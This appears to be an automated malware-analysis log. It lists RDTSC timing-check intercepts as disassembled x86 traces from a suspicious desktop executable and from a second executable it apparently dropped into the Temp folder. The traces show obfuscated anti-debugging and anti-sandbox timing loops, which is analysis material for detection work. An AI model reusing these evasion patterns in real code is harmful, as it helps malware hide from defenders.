Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA022E second address: 4CA02F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007FA3F4513F34h 0x00000012 inc ebx 0x00000013 jmp 00007FA3F4513F30h 0x00000018 test al, al 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e je 00007FA3F45140E2h 0x00000024 pushad 0x00000025 call 00007FA3F4513F35h 0x0000002a pushfd 0x0000002b jmp 00007FA3F4513F30h 0x00000030 adc ch, FFFFFFD8h 0x00000033 jmp 00007FA3F4513F2Bh 0x00000038 popfd 0x00000039 pop esi 0x0000003a movsx ebx, cx 0x0000003d popad 0x0000003e lea ecx, dword ptr [ebp-14h] 0x00000041 pushad 0x00000042 jmp 00007FA3F4513F2Eh 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a pushfd 0x0000004b jmp 00007FA3F4513F2Eh 0x00000050 and si, 6968h 0x00000055 jmp 00007FA3F4513F2Bh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d mov dword ptr [ebp-14h], edi 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FA3F4513F35h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA037D second address: 4CA044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4E971A7h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 jmp 00007FA3F4E971A5h 0x00000015 jg 00007FA466B5526Eh 0x0000001b jmp 00007FA3F4E9719Eh 0x00000020 js 00007FA3F4E971F0h 0x00000026 jmp 00007FA3F4E971A0h 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e pushad 0x0000002f mov cl, 0Ah 0x00000031 popad 0x00000032 jne 00007FA466B5524Ch 0x00000038 pushad 0x00000039 call 00007FA3F4E971A2h 0x0000003e pushfd 0x0000003f jmp 00007FA3F4E971A2h 0x00000044 or eax, 54A78F98h 0x0000004a jmp 00007FA3F4E9719Bh 0x0000004f popfd 0x00000050 pop esi 0x00000051 movsx ebx, si 0x00000054 popad 0x00000055 mov ebx, dword ptr [ebp+08h] 0x00000058 jmp 00007FA3F4E971A0h 0x0000005d lea eax, dword ptr [ebp-2Ch] 0x00000060 pushad 0x00000061 mov bx, si 0x00000064 push eax 0x00000065 pop eax 0x00000066 popad 0x00000067 push ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA044B second address: 4CA0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0453 second address: 4CA0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0459 second address: 4CA045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA045D second address: 4CA04C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e jmp 00007FA3F4E971A0h 0x00000013 nop 0x00000014 jmp 00007FA3F4E971A0h 0x00000019 push eax 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov cl, bh 0x00000025 pushfd 0x00000026 jmp 00007FA3F4E9719Ch 0x0000002b xor si, 3848h 0x00000030 jmp 00007FA3F4E9719Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04C6 second address: 4CA04CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04CC second address: 4CA04D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04D0 second address: 4CA04EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA3F4513F2Fh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA04EE second address: 4CA056A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 and si, 7FEEh 0x0000000e jmp 00007FA3F4E971A9h 0x00000013 popfd 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FA3F4E971A4h 0x00000024 pop eax 0x00000025 pushfd 0x00000026 jmp 00007FA3F4E9719Bh 0x0000002b or al, FFFFFFAEh 0x0000002e jmp 00007FA3F4E971A9h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0596 second address: 4CA059A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA059A second address: 4CA05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05A0 second address: 4CA05D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F37h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05D3 second address: 4CA05D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA05D9 second address: 4C90BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA4661D1F9Ah 0x0000000e xor eax, eax 0x00000010 jmp 00007FA3F44ED65Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007FA3F4514060h 0x0000002d call 00007FA3F880C56Ah 0x00000032 mov edi, edi 0x00000034 jmp 00007FA3F4513F2Eh 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b mov ax, 8B5Dh 0x0000003f jmp 00007FA3F4513F2Ah 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BA1 second address: 4C90BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BA5 second address: 4C90BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BC1 second address: 4C90BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90BD3 second address: 4C90C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA3F4513F37h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov si, 07CBh 0x00000015 pushfd 0x00000016 jmp 00007FA3F4513F30h 0x0000001b add si, FED8h 0x00000020 jmp 00007FA3F4513F2Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov ah, B3h 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edx, si 0x00000033 mov bx, ax 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90C2D second address: 4C90C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90C49 second address: 4C90C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CA3 second address: 4C90CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CA9 second address: 4C90CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4C90CAD second address: 4C90CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA3F4E971A0h 0x00000012 adc si, D2B8h 0x00000017 jmp 00007FA3F4E9719Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0CFE second address: 4CA0D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4513F2Ch 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0D1B second address: 4CA0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0D38 second address: 4CA0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA3F4513F37h 0x00000009 and cl, FFFFFFDEh 0x0000000c jmp 00007FA3F4513F39h 0x00000011 popfd 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a mov ebx, 4DA9383Eh 0x0000001f pushfd 0x00000020 jmp 00007FA3F4513F2Fh 0x00000025 add ch, FFFFFFEEh 0x00000028 jmp 00007FA3F4513F39h 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA3F4513F33h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DC6 second address: 4CA0DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DCA second address: 4CA0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DD0 second address: 4CA0DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DDF second address: 4CA0DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DE3 second address: 4CA0DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov cx, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0DF3 second address: 4CA0E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushfd 0x00000007 jmp 00007FA3F4513F36h 0x0000000c sub ecx, 42EB2928h 0x00000012 jmp 00007FA3F4513F2Bh 0x00000017 popfd 0x00000018 pop esi 0x00000019 popad 0x0000001a call 00007FA4661C8C74h 0x0000001f push 76952B70h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov eax, dword ptr [esp+10h] 0x0000002f mov dword ptr [esp+10h], ebp 0x00000033 lea ebp, dword ptr [esp+10h] 0x00000037 sub esp, eax 0x00000039 push ebx 0x0000003a push esi 0x0000003b push edi 0x0000003c mov eax, dword ptr [769B4538h] 0x00000041 xor dword ptr [ebp-04h], eax 0x00000044 xor eax, ebp 0x00000046 push eax 0x00000047 mov dword ptr [ebp-18h], esp 0x0000004a push dword ptr [ebp-08h] 0x0000004d mov eax, dword ptr [ebp-04h] 0x00000050 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000057 mov dword ptr [ebp-08h], eax 0x0000005a lea eax, dword ptr [ebp-10h] 0x0000005d mov dword ptr fs:[00000000h], eax 0x00000063 ret 0x00000064 pushad 0x00000065 call 00007FA3F4513F35h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0E83 second address: 4CA0EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CA0EA0 second address: 4CA0F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FA3F4513F33h 0x0000000c and ecx, 799A233Eh 0x00000012 jmp 00007FA3F4513F39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test al, al 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop ecx 0x00000022 pushfd 0x00000023 jmp 00007FA3F4513F2Fh 0x00000028 sub ecx, 16EDE54Eh 0x0000002e jmp 00007FA3F4513F39h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB09D0 second address: 4CB0A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E9719Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushfd 0x0000000f jmp 00007FA3F4E971A0h 0x00000014 or esi, 1B246B38h 0x0000001a jmp 00007FA3F4E9719Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A13 second address: 4CB0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A25 second address: 4CB0A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A37 second address: 4CB0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3F4513F39h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A5D second address: 4CB0A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0A63 second address: 4CB0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA3F4513F2Ah 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA3F4513F2Bh 0x0000000f xor al, 0000006Eh 0x00000012 jmp 00007FA3F4513F39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e call 00007FA3F4513F2Ch 0x00000023 call 00007FA3F4513F32h 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a push ecx 0x0000002b mov edx, 4B4492E2h 0x00000030 pop ebx 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 mov cx, 60EBh 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FA3F4513F2Dh 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AE6 second address: 4CB0AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AEA second address: 4CB0AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0AF0 second address: 4CB0B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 8EA7h 0x00000007 mov cx, 6E43h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 jmp 00007FA3F4E971A6h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, 6Bh 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B21 second address: 4CB0B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 45E4h 0x00000007 mov edi, 532BDC50h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FA4661B17ADh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA3F4513F32h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B4A second address: 4CB0B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E9719Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B5C second address: 4CB0B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov eax, 7017E755h 0x00000016 popad 0x00000017 popad 0x00000018 je 00007FA4661C9849h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA3F4513F2Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0B86 second address: 4CB0BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA3F4E971A0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: 4CB0BA6 second address: 4CB0BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA09 second address: 57FA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3F4E9719Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA24 second address: 57FA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4513F39h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 57FA41 second address: 57FA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF200 second address: 6EF206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF206 second address: 6EF20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF20D second address: 6EF215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EF215 second address: 6EF21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E59CE second address: 6E59E6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3F4513F32h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E59E6 second address: 6E59EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE662 second address: 6EE666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7CA second address: 6EE7DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FA3F4E97196h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7DC second address: 6EE7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7E0 second address: 6EE7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6EE7EA second address: 6EE7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1A0A second address: 6F1AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FA3F4E971A6h 0x0000000e pop esi 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ebx 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FA3F4E971A7h 0x00000022 jmp 00007FA3F4E9719Bh 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jmp 00007FA3F4E971A2h 0x00000031 pop eax 0x00000032 mov edi, 531E36AEh 0x00000037 push 00000003h 0x00000039 mov esi, ebx 0x0000003b push 00000000h 0x0000003d jnp 00007FA3F4E97199h 0x00000043 mov dx, si 0x00000046 push 00000003h 0x00000048 mov dword ptr [ebp+122D2A84h], ecx 0x0000004e sbb si, 05B1h 0x00000053 call 00007FA3F4E97199h 0x00000058 je 00007FA3F4E971B3h 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA3F4E971A5h 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1AB9 second address: 6F1AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA3F4513F38h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA3F4513F38h 0x00000017 rdtsc
